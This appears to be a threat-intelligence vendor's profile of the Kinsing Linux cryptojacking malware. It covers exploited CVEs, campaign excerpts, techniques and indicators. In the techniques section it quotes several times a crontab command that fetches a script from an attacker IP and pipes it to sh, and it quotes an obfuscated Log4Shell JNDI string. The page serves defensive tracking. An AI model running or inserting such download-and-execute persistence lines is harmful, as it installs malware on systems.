Kinsing is a Linux-focused malware family and cryptojacking operation associated with opportunistic exploitation of internet-exposed services, cloud workloads, containers, and misconfigured infrastructure. It is widely known for deploying XMRig-based Monero mining payloads, but multiple campaigns also include a Go-based remote access component that provides backdoor functionality, command execution, scanning, and propagation support. Kinsing activity has been observed against exposed Docker APIs, Kubernetes and containerized environments, Redis, Jenkins, Hadoop YARN, SaltStack, Citrix ADC, vulnerable WordPress installations, Apache ActiveMQ, and systems exposed through widely exploited vulnerabilities including Log4Shell, CVE-2020-11651, CVE-2020-11652, CVE-2019-19781, CVE-2020-25213, CVE-2017-9841, and CVE-2023-46604.
Operationally, Kinsing commonly arrives through shell scripts or exploit-delivered commands that disable security tooling, kill competing miners, fetch additional payloads, and establish persistence through cron jobs or system services. In several documented intrusions, the malware chain deployed both a Golang RAT and an XMRig miner, matching long-observed Kinsing tradecraft. The Go component has been linked to capabilities such as encrypted command-and-control, command execution, SOCKS proxying, scanning, brute-force activity against services such as Redis, and download-and-execute tasking. Campaigns have also shown SSH-based lateral movement and spreading behavior across cloud and container environments.
Kinsing is strongly associated with cloud-native cryptojacking. It has repeatedly targeted Linux servers in public cloud and container ecosystems, including workloads reachable through exposed orchestration or management interfaces. The malware routinely performs process discovery, removes rival malware, manipulates scheduled tasks, and uses obfuscation to hinder detection. Some reporting also describes rootkit-related functionality or accompanying rootkit components in Kinsing-linked deployments.
Although monetization through cryptomining remains its defining purpose, more recent activity indicates broader post-exploitation ambitions. Experimental intrusions attributed to the Kinsing threat actor included manual exploitation steps, reverse-shell deployment, attempted local privilege escalation via Looney Tunables, installation of a web-shell backdoor, and attempts to access cloud metadata and credentials in AWS environments. These behaviors suggest that Kinsing operations can extend beyond automated miner deployment into persistent access, privilege escalation, reconnaissance, and credential-focused cloud intrusion activity.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
14 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
The vulnerability, which can allow an attacker to execute arbitrary code by sending crafted log messages, has been identified as CVE-2021-44228 and given the name Log4Shell. | We have observed threat actors dropping Mirai variants and Kinsing coinminers onto vulnerable servers.
In January 2020, the year started off with several malware families conducting campaigns against Citrix Application Delivery Controller (ADC) devices via CVE-2019-19781. | Intezer took the lead on this documentation, demonstrating through an analysis of code similarities that the samples seen in SaltStack exploits were related to the Kinsing RAT. In the execution of the malware, two binaries showed up: a Golang-based RAT and a XMRIG miner. This matches previous Kinsing campaigns.
In May 2020, security vendors linked Kinsing to an additional campaign: one exploiting SaltStack CVE-2020-11651 and CVE-2020-11652. | Intezer took the lead on this documentation, demonstrating through an analysis of code similarities that the samples seen in SaltStack exploits were related to the Kinsing RAT. In the execution of the malware, two binaries showed up: a Golang-based RAT and a XMRIG miner. This matches previous Kinsing campaigns.
In May 2020, security vendors linked Kinsing to an additional campaign: one exploiting SaltStack CVE-2020-11651 and CVE-2020-11652. | Intezer took the lead on this documentation, demonstrating through an analysis of code similarities that the samples seen in SaltStack exploits were related to the Kinsing RAT. In the execution of the malware, two binaries showed up: a Golang-based RAT and a XMRIG miner. This matches previous Kinsing campaigns.
The Kinsing threat actor has a history of exploiting the PHPUnit vulnerability (CVE-2017-9841)... The initial access was conducted by exploitation of the PHPUnit vulnerability (CVE-2017-9841). | Researchers from Aqua Nautilus have successfully intercepted Kinsing’s experimental incursions into cloud environments... The Kinsing threat actor has a history of exploiting the PHPUnit vulnerability (CVE-2017-9841)... Kinsing downloads and runs the Perl script bc.pl... downloads the script gnu-acme.py, which is actually an exploit of the Looney Tunables vulnerability (CVE-2023-4911)... Subsequently, Kinsing fetches and executes an additional PHP exploit... creating a web shell backdoor allowing further unauthorized access to the server.
we have uncovered the threat actor’s manual efforts to manipulate the Looney Tunables vulnerability (CVE-2023-4911)... These tests were aimed at probing the Looney Tunables vulnerabilities (CVE-2023-4911)... Looney Tunables is a high-severity vulnerability resides in the GNU C Library (glibc), specifically targeting its dynamic loader, ld.so. | Researchers from Aqua Nautilus have successfully intercepted Kinsing’s experimental incursions into cloud environments... The Kinsing threat actor has a history of exploiting the PHPUnit vulnerability (CVE-2017-9841)... Kinsing downloads and runs the Perl script bc.pl... downloads the script gnu-acme.py, which is actually an exploit of the Looney Tunables vulnerability (CVE-2023-4911)... Subsequently, Kinsing fetches and executes an additional PHP exploit... creating a web shell backdoor allowing further unauthorized access to the server.
In December 2020, Unit 42 researchers observed attempts to exploit CVE-2020-25213, which is a file upload vulnerability in the WordPress File Manager plugin. Successful exploitation of this vulnerability allows an attacker to upload an arbitrary file with arbitrary names and extensions, leading to Remote Code Execution (RCE) on the targeted web server. | This exploit was used by attackers to install webshells, which in turn were used to install Kinsing, malware that runs a malicious cryptominer from the H2miner family.
Aqua Nautilus discovered a new campaign that exploits the Openfire vulnerability (CVE-2023-32315) ... This vulnerability leads to a path traversal attack, which grants an unauthenticated user access to the Openfire setup environment. This then allows the threat actor to create a new admin user and upload malicious plugins. Eventually the attacker can gain full control over the server. | Aqua Nautilus discovered a new campaign that exploits the Openfire vulnerability (CVE-2023-32315) ... to deploy Kinsing malware and a cryptominer.
Apache issued a critical advisory addressing CVE-2023-46604, a vulnerability involving the deserialization of untrusted data in Apache. CISA added CVE-2023-46604 to its known exploited list, and Fortiguard Labs reported active exploitation. Technical details and proof-of-concept code are publicly available, and threat actors are exploiting it to disseminate malware including GoTitan, PrCtrl Rat, Sliver, Kinsing, and Ddostf. | Kinsing has solidified its position in cryptojacking operations, showcasing its ability to quickly capitalize on newly discovered vulnerabilities.
NBS team try to bring readers to understand an attack that abusing JetBrains TeamCity vulnerability Authentication Bypass Flaw which led to Remote Code Execution (CVE-2023-42793) as their initial access. The vulnerability was discovered by the PTSWARM team and was abused by various threat actors to spread their malware. | The script includes instructions to download a Linux binary file called 'kinsing' which is a Coinminer malware that are compiled in Golang. Additionally, the execution of the 'kinsing' ELF led to the creation of a process named 'kdevtmpfsi' ELF where the binary was located in the temporary directory Linux (/tmp).
Darktrace observed malicious actors validating exploits for one such critical vulnerability, likely the critical RCE vulnerability, CVE-2023-38035, on Ivanti Sentry servers within multiple customer networks... CVE-2023-38035 is a critical authentication bypass vulnerability affecting the System Manager Portal of Ivanti Sentry systems... an unauthenticated actor with access to the System Manager Portal can achieve Remote Code Execution (RCE) on the underlying Ivanti Sentry system. | In a cryptomining case on another customer’s network, an Ivanti Sentry server was seen making GET requests indicative of Kinsing malware infection.
Threat actors are continuing to exploit a critical Langflow vulnerability as part of fresh attacks designed to deliver a Monero cryptocurrency miner. The activity has been found to weaponize CVE-2026-33017 (CVSS score: 9.3), an unauthenticated remote code execution (RCE) vulnerability in Langflow, indicating threat actors are scanning and targeting exposed artificial intelligence (AI) application endpoints for obtaining initial access to enterprise networks.
"A critical remote code execution (RCE) vulnerability, identified as CVE-2025-55182 and dubbed React2Shell, exists within the React Server Components (RSC) architecture, allowing unauthenticated attackers to execute arbitrary code..."
"x522, which kills competing miners such as XMRig and Kinsing, and launches the miner with a c3pool.org configuration"
1 distinct threat actor attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Most notably, TeamTNT was reported to have copied the code used to detect and remove Alibaba Cloud Security from compromised instances from the Kinsing group.
23 distinct techniques documented for this family, organized by ATT&CK tactic.
( crontab -l 2>/dev/null echo "* * * * * $LDR http://185.191.32[.]198/lh.sh | sh > /dev/null 2>&1" ) | crontab -
These components can include a shell script or a java class that can write a file to disk or memory and executes the final payload.
Next a new shell script is downloaded as a secondary payload. This script creates a cronjob and delete competition
( crontab -l 2>/dev/null echo "* * * * * $LDR http://185.191.32[.]198/lh.sh | sh > /dev/null 2>&1" ) | crontab -
This vulnerability allows the creation of a new admin user ... Once the new user is successfully created, it enables the threat actor to undergo a valid authentication process for the Openfire Administration Panel.
Next, the threat actor is uploading a malicious plugin that allows web shell commands on the server ... This plugin contains a Java class named cmd.jsp that is a backdoor
( crontab -l 2>/dev/null echo "* * * * * $LDR http://185.191.32[.]198/lh.sh | sh > /dev/null 2>&1" ) | crontab -
There are a variety of forms of obfuscation being used to prevent detection of scanning or exploitation, including the use of nested strings to invoke the JNDI interface (such as (${${::-j}${::-n}${::-d}${::-I}) ).
If the system is a Linux-compatible system, the malware will attempt to locate and remove any existing Kinsing malware and clear the existing Crontab configuration.
149 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
71 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Known Linux cryptominer malware referenced as an example of commodity malware detectable via signatures such as YARA rules or hash matching.
Kinsing is referenced as a competing cryptocurrency miner that the deployed miner attempts to kill and displace on compromised systems.
Referenced as a competing cryptomining malware family whose processes are terminated by lambsys.
A rival Linux cryptomining malware family referenced as a competitor that lambsys explicitly detects and kills, including typo-variant process names and persistence artifacts.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.